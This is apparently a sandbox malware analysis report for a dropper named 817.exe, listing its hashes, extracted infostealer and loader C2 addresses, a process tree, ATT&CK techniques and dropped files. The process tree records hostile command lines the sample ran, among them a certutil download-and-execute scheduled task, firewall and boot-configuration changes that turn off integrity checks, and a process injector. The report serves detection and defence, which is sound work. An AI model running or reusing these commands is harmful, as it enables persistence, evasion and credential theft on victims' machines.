Overview

overview

10

Static

static

3

817.exe

windows7-x64

10

817.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-11-2024 08:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    817.exe

  • Size

    9.8MB

  • MD5

    724f01298e921f1f7362af6b1bc31642

  • SHA1

    e892f38da2f930133cf67533e592ded56b7d6154

  • SHA256

    8174d7d1e9ccf99d8a0164e39dbb7df725cbd710cf2f611d3ca4f2fdeb434535

  • SHA512

    ee276907cf9d4a0039d3c0affdb318bf08c1b265f4b454bfc9459a923428e701efeccbae1d88c40e2bbc56e05602289aa7e142f7193f39ec4e20bb2fcb4f0953

  • SSDEEP

    196608:PafYtJ9mT5kszFw1d4zZkxaZzDaC0b8LP3gt82xHWPM/SJrUliFGpKERxRE50:SCJ9E5kszq4zZqwzD30biPwzUPZUliFm

Score
10/10
fabookieffdroidergluptebametasploitprivateloaderredlinesectopratsocelarsbuild2_mastifupdagilenetbackdoordiscoverydropperevasioninfostealerloaderpersistenceprivilege_escalationratrootkitspywarestealertrojanupx

Malware Config

Extracted

Family

redline

Botnet

UPD

C2

193.56.146.78:54955

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

privateloader

C2

http://37.0.10.214/proxies.txt

http://37.0.10.244/server.txt

http://wfsdragon.ru/api/setStats.php

37.0.10.237

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

ffdroider

C2

http://186.2.171.3

Extracted

Family

redline

Botnet

Build2_Mastif

C2

95.181.157.69:8552

Signatures

  • Detect Fabookie payload 1 IoCs
  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

    stealerffdroider
  • FFDroider payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

    spywarestealerfabookie
  • Fabookie family
    fabookie
  • Ffdroider family
    ffdroider
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba family
    glupteba
  • Glupteba payload 16 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • Privateloader family
    privateloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 7 IoCs
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 7 IoCs
  • Sectoprat family
    sectoprat
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars family
    socelars
  • Socelars payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
    evasiontrojan
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 64 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 8 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • NTFS ADS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
    • Suspicious behavior: LoadsDriver
    PID:476
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs
      2⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:852
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Modifies registry class
      PID:2876
  • C:\Users\Admin\AppData\Local\Temp\817.exe
    "C:\Users\Admin\AppData\Local\Temp\817.exe"
    1⤵
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Users\Admin\AppData\Local\Temp\Lsr.exe
      "C:\Users\Admin\AppData\Local\Temp\Lsr.exe"
      2⤵
      • Executes dropped EXE
      PID:2152
    • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
      "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2824
    • C:\Users\Admin\AppData\Local\Temp\Info.exe
      "C:\Users\Admin\AppData\Local\Temp\Info.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:1920
      • C:\Users\Admin\AppData\Local\Temp\Info.exe
        "C:\Users\Admin\AppData\Local\Temp\Info.exe"
        3⤵
        • Windows security bypass
        • Executes dropped EXE
        • Loads dropped DLL
        • Windows security modification
        • Adds Run key to start application
        • Checks for VirtualBox DLLs, possible anti-VM trick
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:1724
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
            PID:1324
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              5⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • Modifies data under HKEY_USERS
              PID:2184
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe /94-94
            4⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Manipulates WinMon driver.
            • Manipulates WinMonFS driver.
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:1680
            • C:\Windows\system32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2064
            • C:\Windows\system32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2180
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies system certificate store
              PID:408
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:2544
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:3028
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:2156
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:320
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:1620
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:1968
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:2484
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:2240
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:1200
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:1324
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:1504
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -timeout 0
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:3012
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:880
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:2360
            • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
              5⤵
              • Executes dropped EXE
              PID:1856
            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1764
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Users\Admin\AppData\Local\Temp\Folder.exe
          "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1820
      • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
        "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2224
      • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
        "C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
        2⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:1916
      • C:\Users\Admin\AppData\Local\Temp\File.exe
        "C:\Users\Admin\AppData\Local\Temp\File.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1932
      • C:\Users\Admin\AppData\Local\Temp\Installation.EXE
        "C:\Users\Admin\AppData\Local\Temp\Installation.EXE"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:636
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:912
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.cmd" "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:764
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1XQju7
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              PID:1040
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1040 CREDAT:275457 /prefetch:2
                6⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:3032
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2440
          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
            "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2084
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im chrome.exe
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2760
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im chrome.exe
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            PID:2132
      • C:\Users\Admin\AppData\Local\Temp\pub2.exe
        "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1548
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 136
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:1688
      • C:\Users\Admin\AppData\Local\Temp\Files.exe
        "C:\Users\Admin\AppData\Local\Temp\Files.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:2012
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1868
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:876
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3048 CREDAT:275457 /prefetch:2
        2⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • NTFS ADS
        • Suspicious use of SetWindowsHookEx
        PID:3040
    • C:\Windows\system32\rUNdlL32.eXe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
      1⤵
      • Process spawned unexpected child process
      PID:2892
      • C:\Windows\SysWOW64\rundll32.exe
        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
    • C:\Windows\system32\makecab.exe
      "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241111083246.log C:\Windows\Logs\CBS\CbsPersist_20241111083246.cab
      1⤵
      • Drops file in Windows directory
      PID:1728

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Impair Defenses

    4
    T1562

    Disable or Modify System Firewall

    1
    T1562.004

    Disable or Modify Tools

    2
    T1562.001

    Modify Registry

    5
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Credential Access

    Credentials from Password Stores

    1
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    3
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
      Filesize

      4KB

      MD5

      da597791be3b6e732f0bc8b20e38ee62

      SHA1

      1125c45d285c360542027d7554a5c442288974de

      SHA256

      5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

      SHA512

      d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K\1Z7Nd7[1].png
      Filesize

      116B

      MD5

      ec6aae2bb7d8781226ea61adca8f0586

      SHA1

      d82b3bad240f263c1b887c7c0cc4c2ff0e86dfe3

      SHA256

      b02fffaba9e664ff7840c82b102d6851ec0bb148cec462cef40999545309e599

      SHA512

      aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K\favicon[1].png
      Filesize

      2KB

      MD5

      18c023bc439b446f91bf942270882422

      SHA1

      768d59e3085976dba252232a65a4af562675f782

      SHA256

      e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482

      SHA512

      a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROLMKJ86\suggestions[1].en-US
      Filesize

      17KB

      MD5

      5a34cb996293fde2cb7a4ac89587393a

      SHA1

      3c96c993500690d1a77873cd62bc639b3a10653f

      SHA256

      c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

      SHA512

      e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

      Download Submit

    • C:\Users\Admin\AppData\Local\Module_Art\Lsr.exe_Url_jhn0ksrlzfnp5iomvb4rdc0z33jdzvm0\1.2.1.0\5zsoycl4.newcfg
      Filesize

      1KB

      MD5

      d71a12b7aa02592b03878877eb133425

      SHA1

      899c5404464c3efed66534207d0245e0cf050488

      SHA256

      b44c3fa39198be28e0e723fd458eae31a5f05041926917fe11e2b265aa0cbee4

      SHA512

      ae0733fe01b479f4ad291ac1180ae9f9b5833fa072001c40728d9f26d4aa9e94ec0239432df16cad35c2675b41d58c6e599fbd0dbc1354d297ab8bca30cd4441

      Download Submit

    • C:\Users\Admin\AppData\Local\Module_Art\Lsr.exe_Url_jhn0ksrlzfnp5iomvb4rdc0z33jdzvm0\1.2.1.0\user.config
      Filesize

      842B

      MD5

      1b02b89ab3872d00c6a46cb4a7048dc9

      SHA1

      0840aefbbe40a00d7290d32ce8243de3cf98339e

      SHA256

      ac8517efbed88850a40943fbd667d9a06f6a156f0031109f59b4ca821aa22fd4

      SHA512

      0eeee6c2cf1eaa11d561ba17ed65caf97e069b5ccbf7420c3ae4bf88859f1273034a600da91620411b12cd3241dcfabdc8d4ddd58218f2781254ac6ccf1fa419

      Download Submit

    • C:\Users\Admin\AppData\Local\Module_Art\Lsr.exe_Url_jhn0ksrlzfnp5iomvb4rdc0z33jdzvm0\1.2.1.0\user.config
      Filesize

      964B

      MD5

      8e18625cd36f0075da4bf0ce8fac8204

      SHA1

      0df80ad1c5ea9bddcb5cfcf2c60c6fb3db903216

      SHA256

      35799f5570b76aa51478e74ea9d1c42b39be157c3953a2b44047dd3ed2e629b1

      SHA512

      74d8be6cddfc1c13acb30c18752d93ef8d57348b8b29220914ecb126ae8459318dd150b2f51299870119bdb6483f35417baa988c688f0f621512c5a47e227c26

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.cmd
      Filesize

      51B

      MD5

      21661026606353f423078c883708787d

      SHA1

      338e288b851e0e5bee26f887e50bfcd8150e8257

      SHA256

      6a77796213adbc0eb764c070a3fdfcb5bfa3ad9b6215c1be43f09bfd32014782

      SHA512

      61760ab64e2c38d9bd5102ab0106e451a5c91e1598906f92e1285b7ae1ca1c6e02480d4157d0f350d2dc816088b5b0838a5d7c7b9d80444ecbf9d62b9ca5b65b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabF326.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\File.exe
      Filesize

      1.5MB

      MD5

      c1271d58b0ab3df4cbb0840d81244018

      SHA1

      9f5c1a582398ea15e38c7c65f5bd04d70b12443f

      SHA256

      49e0e6af1a6a1a3154c94a4d1211e2474016e71575ff0abc1e11dcd35f5bf7fa

      SHA512

      5164826528704cc4d9b253f02c4afaac680ab8db1b4e40055d8d28abf28b93e8b3cf71799474ebc3e964194321a4dc43d7e66c337284f19d6b1106b1a5fe7ded

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
      Filesize

      117KB

      MD5

      3973c47bf5f334ea720a9d603d2c6510

      SHA1

      bf2b72dc12d4d41e08b452e465c40d010b2aba4e

      SHA256

      4e9a1202844e30f1d62d837cdb440764c851740ab8ee2bd4a8a31475bd449eea

      SHA512

      cafc322ba71bafad2b15b82553a2a0749d0b6cb8349fe7fd24de25f7dca48c5aa0c9e7d170571c87a55381ec21d33045d7ba9a17891aabee187358da9b406861

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Installation.EXE
      Filesize

      873KB

      MD5

      082e6059ae7f09964513b3d004b3461d

      SHA1

      34d451bfb788e6ec851726000589950d33f87c76

      SHA256

      a68f7f3c6b1acd3c06c6ed7f2864e87ea19850a81e2f1e0753927786034aec2c

      SHA512

      d87f24250f976d752f260847d6d870b90eb45e445e2f5287d1fc33963a2a72a9f97c92b4055709dff0ffd613253efd23a9f29a891cff947c5f114fdbe3222d36

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Kno85A.tmp
      Filesize

      88KB

      MD5

      002d5646771d31d1e7c57990cc020150

      SHA1

      a28ec731f9106c252f313cca349a68ef94ee3de9

      SHA256

      1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f

      SHA512

      689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
      Filesize

      111KB

      MD5

      d651fe94f2081eb548f7a01d55b6863d

      SHA1

      dfa32d030bcaa1ba90abca64d757f03bc0bdddee

      SHA256

      997e3df5fea270ef3feeb98f2d85fada19f6e769d61f85144606b8d4607d38fd

      SHA512

      24e48d15637c3ce10e303f7ce01be7cd9f35277d32c62bb71b560b6278e1d2851f9fe4b7feba1b4c05bb0348a491df8f484cee4eaec6babd6e71285434df27c1

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
      Filesize

      540KB

      MD5

      a075cc71090b9f5661c8dffc5bf803d0

      SHA1

      b783c854bd68a24d0f35ffae4e93dd071d7c7f77

      SHA256

      5d8eab6bf34f3c6ba765c74da2f7f03fab32552490ac705eed32fa36c8365309

      SHA512

